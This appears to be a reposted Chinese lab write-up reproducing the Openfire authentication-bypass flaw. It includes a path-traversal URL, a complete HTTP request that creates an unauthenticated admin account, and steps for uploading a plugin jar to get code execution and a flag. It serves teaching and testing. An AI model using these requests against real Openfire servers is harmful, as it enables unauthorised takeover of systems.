Openfire 身份认证绕过漏洞复现

admin 2024年5月19日22:35:16评论29 views字数 955阅读3分11秒阅读模式
本文由掌控安全学院- 未曾 投稿
首先进入靶场访问

https://域名:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jspOpenfire 身份认证绕过漏洞复现

出现上图所示的日志泄露即可确定漏洞存在
接下来bp抓包,在重发器里填入以下数据包内容:

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=xxxxx&username=adm123&name=&email=&password=adm123&passwordConfirm=adm123&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7 HTTP/1.1
Host: 域名:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=xxxxx; csrf=xxxxx
Connection: close

Openfire 身份认证绕过漏洞复现

发送出现如图的响应即为成功添加用户,账号密码都为adm123(注:JSESSIONID和csrf可以通过访问登录界面来获取)
登录后台后,去插件那边上传jar包Openfire 身份认证绕过漏洞复现

Openfire 身份认证绕过漏洞复现

然后去服务器-服务器设置运行插件,插件密码123回车Openfire 身份认证绕过漏洞复现

Openfire 身份认证绕过漏洞复现

然后去找flag就好了

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

Openfire 身份认证绕过漏洞复现

Openfire 身份认证绕过漏洞复现

原文始发于微信公众号(掌控安全EDU):Openfire 身份认证绕过漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月19日22:35:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Openfire 身份认证绕过漏洞复现https://cn-sec.com/archives/2021596.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息